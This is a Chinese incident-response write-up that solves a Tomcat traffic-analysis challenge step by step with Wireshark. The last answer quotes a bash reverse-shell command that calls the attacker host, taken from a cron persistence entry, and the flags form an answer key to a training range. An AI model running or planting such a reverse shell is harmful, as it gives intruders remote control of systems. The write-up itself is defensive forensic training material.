免责声明
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
题目来源
玄机应急响应靶场平台
https://xj.edisec.net/题目:第六章 流量特征分析-常见攻击事件 tomcat
点击题目右边附件获取.pcap文件,然后用Wireshark打开
如果没有平台账号,可以在公众号后台回复【流量分析01】获取数据包文件
同时可以关注一波"EDI安全团队"师傅们的的公众号,会不断进行活动并发放平台邀请码。尤其是临近各项HW项目的时间,笔者强烈推荐可以通过该平台高质量的靶机环境模拟,高效巩固与提高研判分析、应急处置的能力等,谁用谁知道。
解题过程
1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}
flag{14.0.0.120}
内网IP的很多端口对1个外网IP的指定端口(51985)返回了响应
2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}
flag{guangzhou}
查询IP归属地即可
https://cip.cc/14.0.0.120
3、哪一个端口提供对web服务器管理面板的访问?flag格式:flag{2222}
flag{8080}
过滤http协议,下滑发现一条 /admin的请求,不过追踪HTTP流(右键-追踪流-HTTP Stream)发现响应包状态码404
继续下滑发现有很多带 /manager 的请求,其中一条返回状态码200,追踪HTTP流查看目标服务器端口即可
4、经过前面对攻击者行为的分析后,攻击者运用的工具是?flag格式:flag{名称}
flag{gobuster}
回溯之前的HTTP请求,追踪流发现UA是gobuster目录扫描器
https://github.com/OJ/gobuster
5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码?flag格式:flag{root-123}
flag{admin-tomcat}
解第3题时就发现很多带/manager 的请求,响应包状态码401 Unauthorized(未授权)
对返回状态码200的响应包追踪流
再对请求头的Authorization(授权)值进行base64解码
6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称?flag格式:flag{114514.txt}
flag{JXQOZY.war}
把鼠标指针放在流的数据值上滑鼠标滚轮到第9460个流,即可发现文件上传请求包与上传文件名
7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息?flag提示,某种任务里的信息
flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}
继续滑动鼠标滚轮到下一个流,即可发现写入Linux计划任务的反弹shell命令
原文始发于微信公众号(划水但不摆烂):【实景挑战 | 应急】流量分析-Tomcat安全事件痕迹捕捉
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论